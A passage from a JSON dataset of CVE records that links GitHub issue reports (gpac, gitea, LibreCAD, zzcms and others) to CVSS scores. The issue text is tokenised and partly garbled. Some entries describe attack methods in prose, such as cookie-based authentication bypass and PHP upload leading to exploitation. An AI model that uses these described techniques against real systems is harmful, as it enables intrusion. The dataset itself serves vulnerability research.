  74927. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG APITAG APITAG ERRORTAG gdb APITAG APITAG APITAG CODETAG",
  74928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  74929. "severity": "HIGH",
  74930. "baseScore": 7.5,
  74931. "impactScore": 3.6,
  74932. "exploitabilityScore": 3.9
  74933. },
  74934. {
  74935. "CVE_ID": "CVE-2021-45267",
  74936. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1965",
  74937. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1965",
  74938. "Repo_new": "gpac/gpac",
  74939. "Issue_Created_At": "2021-12-10T10:59:40Z",
  74940. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG gdb ERRORTAG",
  74941. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74942. "severity": "MEDIUM",
  74943. "baseScore": 5.5,
  74944. "impactScore": 3.6,
  74945. "exploitabilityScore": 1.8
  74946. },
  74947. {
  74948. "CVE_ID": "CVE-2021-45288",
  74949. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1956",
  74950. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1956",
  74951. "Repo_new": "gpac/gpac",
  74952. "Issue_Created_At": "2021-12-10T07:28:18Z",
  74953. "description": "Double Free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb information: ` Program received signal SIGABRT, Aborted. [ registers ] RA NUMBERTAG RB NUMBERTAG ffff NUMBERTAG ffff NUMBERTAG RC NUMBERTAG ffff NUMBERTAG d NUMBERTAG b ( APITAG : mov rax,QWORD PTR [rsp NUMBERTAG RD NUMBERTAG RSI NUMBERTAG fffffff6fd NUMBERTAG RDI NUMBERTAG RBP NUMBERTAG fffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG RSP NUMBERTAG fffffff6fd NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG d NUMBERTAG b ( APITAG : mov rax,QWORD PTR [rsp NUMBERTAG R NUMBERTAG R NUMBERTAG fffffff6fd NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffff NUMBERTAG R NUMBERTAG R NUMBERTAG ffff7ffb NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG d NUMBERTAG f APITAG : mov edi NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : mov ea NUMBERTAG e NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : syscall NUMBERTAG ffff NUMBERTAG d NUMBERTAG b APITAG : mov rax,QWORD PTR [rsp NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : xor rax,QWORD PTR fs NUMBERTAG ffff NUMBERTAG d NUMBERTAG c APITAG : jne NUMBERTAG ffff NUMBERTAG d NUMBERTAG c4 APITAG NUMBERTAG ffff NUMBERTAG d NUMBERTAG e APITAG : mov eax,r8d NUMBERTAG ffff NUMBERTAG d NUMBERTAG a1 APITAG : add rsp NUMBERTAG stack NUMBERTAG fffffff6fd NUMBERTAG fffffff6fd NUMBERTAG fffffff6fe NUMBERTAG ffff6b0ffca APITAG mov rax,QWORD PTR [rsp NUMBERTAG fffffff6fe NUMBERTAG fffffff6ff NUMBERTAG fffffff6ff NUMBERTAG fffffff NUMBERTAG a NUMBERTAG fffffff NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG b3ee in __libc_message APITAG fmt=fmt APITAG \"%s \") at PATHTAG NUMBERTAG ffff NUMBERTAG c in malloc_printerr (str=str APITAG APITAG double free detected in tcache NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ed in _int_free (a NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG , p NUMBERTAG have_lock NUMBERTAG at APITAG NUMBERTAG ffff6bf NUMBERTAG f5 in gf_odf_del_default () from PATHTAG NUMBERTAG ffff6f NUMBERTAG in gf_sm_load_run_isom () from PATHTAG NUMBERTAG c3a NUMBERTAG in dump_isom_scene (file=<optimized out>, APITAG APITAG PATHTAG is_final_name=GF_FALSE, dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at APITAG NUMBERTAG edd0 in APITAG (argc=<optimized out>, argv=<optimized out>) at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b3 in __libc_start_main (main NUMBERTAG d NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG d5be in _start () at APITAG gdb peda$ '''",
  74954. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74955. "severity": "MEDIUM",
  74956. "baseScore": 5.5,
  74957. "impactScore": 3.6,
  74958. "exploitabilityScore": 1.8
  74959. },
  74960. {
  74961. "CVE_ID": "CVE-2021-45289",
  74962. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1972",
  74963. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1972",
  74964. "Repo_new": "gpac/gpac",
  74965. "Issue_Created_At": "2021-12-10T16:55:48Z",
  74966. "description": "Program terminated with signal SIGKILL . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG GDB Information ERRORTAG",
  74967. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74968. "severity": "MEDIUM",
  74969. "baseScore": 5.5,
  74970. "impactScore": 3.6,
  74971. "exploitabilityScore": 1.8
  74972. },
  74973. {
  74974. "CVE_ID": "CVE-2021-45290",
  74975. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4383",
  74976. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4383",
  74977. "Repo_new": "webassembly/binaryen",
  74978. "Issue_Created_At": "2021-12-10T22:07:52Z",
  74979. "description": "An assertion abort in wasm::handle_unreachable(char const , char const , unsigned int) () . Version: APITAG System information Ubuntu NUMBERTAG LTS, clang version NUMBERTAG ubuntu1 command: APITAG FILETAG Result APITAG GDB information ERRORTAG",
  74980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  74981. "severity": "HIGH",
  74982. "baseScore": 7.5,
  74983. "impactScore": 3.6,
  74984. "exploitabilityScore": 3.9
  74985. },
  74986. {
  74987. "CVE_ID": "CVE-2021-45291",
  74988. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1955",
  74989. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1955",
  74990. "Repo_new": "gpac/gpac",
  74991. "Issue_Created_At": "2021-12-10T06:46:26Z",
  74992. "description": "A segmentation fault in APITAG at APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb information: ERRORTAG",
  74993. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74994. "severity": "MEDIUM",
  74995. "baseScore": 5.5,
  74996. "impactScore": 3.6,
  74997. "exploitabilityScore": 1.8
  74998. },
  74999. {
  75000. "CVE_ID": "CVE-2021-45292",
  75001. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1958",
  75002. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1958",
  75003. "Repo_new": "gpac/gpac",
  75004. "Issue_Created_At": "2021-12-10T08:22:50Z",
  75005. "description": "A segmentation fault in gf_isom_hint_rtp_read () , APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG GDB information ERRORTAG",
  75006. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75007. "severity": "MEDIUM",
  75008. "baseScore": 5.5,
  75009. "impactScore": 3.6,
  75010. "exploitabilityScore": 1.8
  75011. },
  75012. {
  75013. "CVE_ID": "CVE-2021-45293",
  75014. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4384",
  75015. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4384",
  75016. "Repo_new": "webassembly/binaryen",
  75017. "Issue_Created_At": "2021-12-10T22:22:07Z",
  75018. "description": "Invalid memory address dereference in APITAG ). Version: APITAG System information Ubuntu NUMBERTAG LTS, clang version NUMBERTAG ubuntu1 command: APITAG FILETAG Result APITAG GDB information CODETAG",
  75019. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75020. "severity": "MEDIUM",
  75021. "baseScore": 5.5,
  75022. "impactScore": 3.6,
  75023. "exploitabilityScore": 1.8
  75024. },
  75025. {
  75026. "CVE_ID": "CVE-2021-45297",
  75027. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1973",
  75028. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1973",
  75029. "Repo_new": "gpac/gpac",
  75030. "Issue_Created_At": "2021-12-10T19:07:05Z",
  75031. "description": "infinite loop in gf_get_bit_size\uff08\uff09. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! APITAG ] I looked for a similar issue and couldn't find any. [ Yes] I tried with the latest version of GPAC. Installers available at URLTAG [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG Version: ERRORTAG System information Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG command: APITAG Result APITAG GDB information CODETAG",
  75032. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75033. "severity": "MEDIUM",
  75034. "baseScore": 5.5,
  75035. "impactScore": 3.6,
  75036. "exploitabilityScore": 1.8
  75037. },
  75038. {
  75039. "CVE_ID": "CVE-2021-45325",
  75040. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4973",
  75041. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4973",
  75042. "Repo_new": "go-gitea/gitea",
  75043. "Issue_Created_At": "2018-09-21T19:40:56Z",
  75044. "description": "server side request forgery (SSRF) vulnerability in APITAG sign in. Another SSRF issue ( the others reported on Gogs repository ). Affected URL: APITAG Payload as APITAG URI: APITAG Response: APITAG It's less severe than the one in the webhooks because in the case of a web server it doesn't show the full HTTP response body and headers, just that the APITAG isn't found. It still shows servers signatures for non HTTP servers, for example for SSH, showed above. URLTAG",
  75045. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75046. "severity": "HIGH",
  75047. "baseScore": 7.5,
  75048. "impactScore": 3.6,
  75049. "exploitabilityScore": 3.9
  75050. },
  75051. {
  75052. "CVE_ID": "CVE-2021-45328",
  75053. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4332",
  75054. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4332",
  75055. "Repo_new": "go-gitea/gitea",
  75056. "Issue_Created_At": "2018-06-28T14:02:25Z",
  75057. "description": "Open Redirect vulnerability. APITAG Gitea version (or commit ref): any Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [x] Yes (provide example URL) [ ] No [ ] Not relevant Log gist: not relevent Description As said in NUMBERTAG PR NUMBERTAG doesn't mitigate the issue because there are still Open Redirect issues in other parts of Gitea, thus is possible to redirect the login to an internal link where the issue is not mitigated. See the following url: FILETAG or shorter: FILETAG Screenshots None APITAG",
  75058. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75059. "severity": "MEDIUM",
  75060. "baseScore": 6.1,
  75061. "impactScore": 2.7,
  75062. "exploitabilityScore": 2.8
  75063. },
  75064. {
  75065. "CVE_ID": "CVE-2021-45330",
  75066. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4336",
  75067. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4336",
  75068. "Repo_new": "go-gitea/gitea",
  75069. "Issue_Created_At": "2018-06-28T15:28:30Z",
  75070. "description": "Log out only deletes cookies. APITAG Gitea version (or commit ref): any Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [ ] No [x] Not relevant Log gist: Description If user log outs the session / cookies don't expire, allowing an attacker to be still logged in. In fact Gitea log out users by deleting cookies on client side, but they are still valid server side. Getting the cookies requires a MITM attack, so it isn't so easy to exploit. Issue already reported on mail two months ago but never got an answer. Screenshots None APITAG",
  75071. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75072. "severity": "CRITICAL",
  75073. "baseScore": 9.8,
  75074. "impactScore": 5.9,
  75075. "exploitabilityScore": 3.9
  75076. },
  75077. {
  75078. "CVE_ID": "CVE-2021-45340",
  75079. "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/51",
  75080. "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/51",
  75081. "Repo_new": "libsixel/libsixel",
  75082. "Issue_Created_At": "2021-12-14T22:08:42Z",
  75083. "description": "NULL pointer dereference in stb_image.h. This is a duplicate report of issue NUMBERTAG URLTAG in the original project. I'm not sure where best to report this, but it affects both projects. Vulnerable versions saitoha/libsixel at the latest APITAG commit libsixel/libsixel at the latest APITAG commit Steps to reproduce APITAG Input file (a malformed PICT format image) is FILETAG Cause Segmentation fault in APITAG at APITAG : CODETAG The src pointer is NULL , as passed in from APITAG . The source of the NULL pointer is the malloc at line APITAG : APITAG whose output is never checked for NULL . The x and y dimensions NUMBERTAG are read directly from the input file, and they pass the check in APITAG which only checks for integer overflow. The total size of the allocated buffer is APITAG and allocation fails. Impact Denial of service is the only obvious impact. Mitigation APITAG starting at version NUMBERTAG commit APITAG include a check for this condition. libsixel should be brought up to date with this version if possible. If not, backport the check URLTAG as well as similar error checks for other malloc calls.",
  75084. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75085. "severity": "MEDIUM",
  75086. "baseScore": 6.5,
  75087. "impactScore": 3.6,
  75088. "exploitabilityScore": 2.8
  75089. },
  75090. {
  75091. "CVE_ID": "CVE-2021-45341",
  75092. "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1462",
  75093. "Issue_Url_new": "https://github.com/librecad/librecad/issues/1462",
  75094. "Repo_new": "librecad/librecad",
  75095. "Issue_Created_At": "2021-12-18T19:01:27Z",
  75096. "description": "Remote Code Execution vulnerability in APITAG NUMBERTAG rc3. Vulnerable Products APITAG NUMBERTAG rc3 and older Jw_cad NUMBERTAG a and older Steps to reproduce or sample file NUMBERTAG Start APITAG NUMBERTAG rc3 in a debugger NUMBERTAG APITAG NUMBERTAG Unzip and open the attached FILETAG NUMBERTAG Observe APITAG crash, with APITAG (AAAA) Screenshot: FILETAG Cause The APITAG entity deserialization at APITAG is vulnerable to a stack buffer overflow. APITAG declared in APITAG on line NUMBERTAG URLTAG is of fixed size NUMBERTAG Some varieties of APITAG provide their own size, e.g. APITAG on line NUMBERTAG URLTAG and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address. The attached APITAG file is tuned to trigger this behavior in the latest windows release of APITAG but the same bug is also present in older versions and on other platforms. Impact An attacker can craft a JW CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running APITAG with the privileges of the current user. Proposed Mitigation NUMBERTAG Perform bounds checking in APITAG , and refuse to load the file if it would overflow buf NUMBERTAG Enable stack smashing protection in the windows build of APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
  75097. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  75098. "severity": "HIGH",
  75099. "baseScore": 8.8,
  75100. "impactScore": 5.9,
  75101. "exploitabilityScore": 2.8
  75102. },
  75103. {
  75104. "CVE_ID": "CVE-2021-45342",
  75105. "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1464",
  75106. "Issue_Url_new": "https://github.com/librecad/librecad/issues/1464",
  75107. "Repo_new": "librecad/librecad",
  75108. "Issue_Created_At": "2021-12-18T22:48:34Z",
  75109. "description": "Remote Code Execution vulnerability in APITAG NUMBERTAG rc3 (JWW APITAG Vulnerable Products APITAG NUMBERTAG rc3 and older Steps to reproduce or sample file NUMBERTAG Start APITAG NUMBERTAG in a debugger NUMBERTAG APITAG NUMBERTAG Unzip and open the FILETAG NUMBERTAG Observe APITAG crash, with APITAG (AAAA) Screenshot: FILETAG Cause The APITAG entity deserialization in APITAG is vulnerable to a stack buffer overflow. APITAG declared in APITAG on line NUMBERTAG URLTAG is of fixed size NUMBERTAG One variety of APITAG provides its own size field, as seen on line NUMBERTAG URLTAG and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address. The attached APITAG file is tuned to trigger this behavior in the latest windows release of APITAG but the same bug is also present in older versions and on other platforms. Note : This is similar to, but distinct from issue NUMBERTAG Impact An attacker can craft a JW CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running APITAG with the privileges of the current user. Proposed Mitigation NUMBERTAG Perform bounds checking in APITAG , and refuse to load more data to buf than actually supported NUMBERTAG Enable stack smashing protection in the windows build of APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
  75110. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  75111. "severity": "HIGH",
  75112. "baseScore": 7.8,
  75113. "impactScore": 5.9,
  75114. "exploitabilityScore": 1.8
  75115. },
  75116. {
  75117. "CVE_ID": "CVE-2021-45343",
  75118. "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1468",
  75119. "Issue_Url_new": "https://github.com/librecad/librecad/issues/1468",
  75120. "Repo_new": "librecad/librecad",
  75121. "Issue_Created_At": "2021-12-19T17:00:48Z",
  75122. "description": "NULL pointer dereference in DXF parser, HATCH code NUMBERTAG Steps to reproduce or sample file NUMBERTAG Unzip and load the FILETAG in APITAG NUMBERTAG rc3 Cause The APITAG APITAG is written to when loading a HATCH entity with code NUMBERTAG If this occurs before a code NUMBERTAG the pointer is still NULL , leading to a crash. Impact Denial of service. Proposed Mitigation Ensure that APITAG is not NULL before dereferencing at APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
  75123. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75124. "severity": "MEDIUM",
  75125. "baseScore": 5.5,
  75126. "impactScore": 3.6,
  75127. "exploitabilityScore": 1.8
  75128. },
  75129. {
  75130. "CVE_ID": "CVE-2021-45347",
  75131. "Issue_Url_old": "https://github.com/forget-code/zzcms/issues/2",
  75132. "Issue_Url_new": "https://github.com/forget-code/zzcms/issues/2",
  75133. "Repo_new": "forget-code/zzcms",
  75134. "Issue_Created_At": "2021-12-15T03:07:23Z",
  75135. "description": "Authentication can be bypassed by changing the user name in the cookie to use any password. If the user name in the cookie is changed to an existing user, any password can be used to bypass authentication FILETAG FILETAG",
  75136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  75137. "severity": "HIGH",
  75138. "baseScore": 7.5,
  75139. "impactScore": 3.6,
  75140. "exploitabilityScore": 3.9
  75141. },
  75142. {
  75143. "CVE_ID": "CVE-2021-45364",
  75144. "Issue_Url_old": "https://github.com/Stakcery/Web-Security/issues/2",
  75145. "Issue_Url_new": "https://github.com/y4tacker/web-security/issues/2",
  75146. "Repo_new": "y4tacker/web-security",
  75147. "Issue_Created_At": "2021-12-16T11:50:04Z",
  75148. "description": "FILETAG look at APITAG It allows us to pass in any parameter and has no filter FILETAG FILETAG After that we just need to find a place to upload the file we visist APITAG \uff0cand upload APITAG with APITAG in APITAG look at funtion APITAG FILETAG Just the postfix checksum from the configuration file we just modified\uff0cI think you should add a separate blacklist that doesn't allow php files to be uploaded and then click upload wo find , successfully upload! FILETAG you must know what it is. FILETAG then we exploit it. FILETAG",
  75149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75150. "severity": "CRITICAL",
  75151. "baseScore": 9.8,
  75152. "impactScore": 5.9,
  75153. "exploitabilityScore": 3.9
  75154. },
  75155. {
  75156. "CVE_ID": "CVE-2021-45380",
  75157. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/8",
  75158. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/8",
  75159. "Repo_new": "source-trace/appcms",
  75160. "Issue_Created_At": "2021-12-16T01:16:21Z",
  75161. "description": "XSS injection vulnerability exists in PATHTAG FILETAG APITAG $_GET FILETAG",
  75162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75163. "severity": "MEDIUM",
  75164. "baseScore": 6.1,
  75165. "impactScore": 2.7,
  75166. "exploitabilityScore": 2.8
  75167. },
  75168. {
  75169. "CVE_ID": "CVE-2021-45385",
  75170. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/47",
  75171. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/47",
  75172. "Repo_new": "rockcarry/ffjpeg",
  75173. "Issue_Created_At": "2021-12-16T03:01:01Z",
  75174. "description": "SEGV in APITAG at APITAG This segment fault error is because in APITAG , when bmp's size is out of range, it returns without assign memory buffer to APITAG and did not exit the program. So the program crashes when it tries to access the APITAG , which is a invalid memory address. Test Environment Ubuntu NUMBERTAG bit ffjpeg (master d5cfd NUMBERTAG How to trigger APITAG POC FILE URLTAG Details gdb report CODETAG",
  75175. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75176. "severity": "MEDIUM",
  75177. "baseScore": 6.5,
  75178. "impactScore": 3.6,
  75179. "exploitabilityScore": 2.8
  75180. },
  75181. {
  75182. "CVE_ID": "CVE-2021-45386",
  75183. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/687",
  75184. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/687",
  75185. "Repo_new": "appneta/tcpreplay",
  75186. "Issue_Created_At": "2021-12-17T07:24:34Z",
  75187. "description": "Bug] Two reachable assertions in APITAG and APITAG Describe the bug There are two reachable assertions in APITAG APITAG and APITAG APITAG when the user uses tcpprep to open a crafted pcap file. To Reproduce Steps to reproduce the behavior NUMBERTAG get the tcpreplay source code (master NUMBERTAG ca NUMBERTAG e3) and build it NUMBERTAG run the cmd: APITAG The poc file could be downloaded in here: [POC_add_tree_ip NUMBERTAG URLTAG POC_add_tree_ip NUMBERTAG URLTAG Expected behavior Program reports assertion failure and is terminated. Screenshots GDB report of POC_add_tree_ip NUMBERTAG ERRORTAG GDB report of POC_add_tree_ip NUMBERTAG ERRORTAG System (please complete the following information): OS: Ubuntu OS version NUMBERTAG Tcpreplay Version NUMBERTAG master NUMBERTAG ca NUMBERTAG e3)",
  75188. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75189. "severity": "MEDIUM",
  75190. "baseScore": 5.5,
  75191. "impactScore": 3.6,
  75192. "exploitabilityScore": 1.8
  75193. },
  75194. {
  75195. "CVE_ID": "CVE-2021-45429",
  75196. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/1616",
  75197. "Issue_Url_new": "https://github.com/virustotal/yara/issues/1616",
  75198. "Repo_new": "virustotal/yara",
  75199. "Issue_Created_At": "2021-12-15T18:01:26Z",
  75200. "description": "Possible insecure pointer conversion in APITAG leading to global buffer overflow. version: master (commit URLTAG command: yara $FILE strings APITAG is a file that can contain any string, such as \"hello\". Here is the trace reported by ASAN: ERRORTAG Commit APITAG introduced a configuration case called APITAG , which will treat the APITAG pointer as a APITAG pointer NUMBERTAG bit). The dereferece operation after this will read NUMBERTAG bits from src. URLTAG Note that, in cli/yara.c, a pointer to the NUMBERTAG bit integer APITAG is passed to APITAG . As a result, APITAG will read NUMBERTAG bits from a NUMBERTAG bit variable. This caused the ERROR reported by ASAN. URLTAG URLTAG A potential damage of this is that an attacker who obtains control of APITAG 's next NUMBERTAG bytes in the memory can further set the higher NUMBERTAG bits of APITAG to arbitrary values and launch exhaustive attacks.",
  75201. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75202. "severity": "MEDIUM",
  75203. "baseScore": 5.5,
  75204. "impactScore": 3.6,
  75205. "exploitabilityScore": 1.8
  75206. },
  75207. {
  75208. "CVE_ID": "CVE-2021-45459",
  75209. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/4",
  75210. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/4",
  75211. "Repo_new": "dwisiswant0/advisory",
  75212. "Issue_Created_At": "2021-08-05T09:12:53Z",
  75213. "description": "OS Command Injection in huntr NUMBERTAG e NUMBERTAG d NUMBERTAG d NUMBERTAG cb NUMBERTAG d0b cb7c NUMBERTAG ac NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  75214. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75215. "severity": "CRITICAL",
  75216. "baseScore": 9.8,
  75217. "impactScore": 5.9,
  75218. "exploitabilityScore": 3.9
  75219. },
  75220. {
  75221. "CVE_ID": "CVE-2021-45746",
  75222. "Issue_Url_old": "https://github.com/WeBankPartners/wecube-platform/issues/2297",
  75223. "Issue_Url_new": "https://github.com/webankpartners/wecube-platform/issues/2297",
  75224. "Repo_new": "webankpartners/wecube-platform",
  75225. "Issue_Created_At": "2021-11-23T08:43:10Z",
  75226. "description": "Path Manipulation. URLTAG URLTAG URLTAG We found 'file' may be contaminated on line NUMBERTAG of APITAG of unfiltered data in selection of requested application file path could lead to sensitive data disclosure and potential theft of proprietary business logic.It will affect on line NUMBERTAG of APITAG",
  75227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75228. "severity": "HIGH",
  75229. "baseScore": 7.5,
  75230. "impactScore": 3.6,
  75231. "exploitabilityScore": 3.9
  75232. },
  75233. {
  75234. "CVE_ID": "CVE-2021-45760",
  75235. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1966",
  75236. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1966",
  75237. "Repo_new": "gpac/gpac",
  75238. "Issue_Created_At": "2021-12-10T11:00:37Z",
  75239. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  75240. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75241. "severity": "MEDIUM",
  75242. "baseScore": 5.5,
  75243. "impactScore": 3.6,
  75244. "exploitabilityScore": 1.8
  75245. },
  75246. {
  75247. "CVE_ID": "CVE-2021-45761",
  75248. "Issue_Url_old": "https://github.com/Boyan-MILANOV/ropium/issues/32",
  75249. "Issue_Url_new": "https://github.com/boyan-milanov/ropium/issues/32",
  75250. "Repo_new": "boyan-milanov/ropium",
  75251. "Issue_Created_At": "2020-07-02T10:19:24Z",
  75252. "description": "Invalid memory address dereference in APITAG An issue was discovered in APITAG NUMBERTAG An invalid memory address dereference was discovered in APITAG The vulnerability causes a segmentation fault and application crash. POC CODETAG CODETAG",
  75253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75254. "severity": "HIGH",
  75255. "baseScore": 7.5,
  75256. "impactScore": 3.6,
  75257. "exploitabilityScore": 3.9
  75258. },
  75259. {
  75260. "CVE_ID": "CVE-2021-45762",
  75261. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1978",
  75262. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1978",
  75263. "Repo_new": "gpac/gpac",
  75264. "Issue_Created_At": "2021-12-11T09:10:17Z",
  75265. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  75266. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75267. "severity": "MEDIUM",
  75268. "baseScore": 5.5,
  75269. "impactScore": 3.6,
  75270. "exploitabilityScore": 1.8
  75271. },
  75272. {
  75273. "CVE_ID": "CVE-2021-45763",
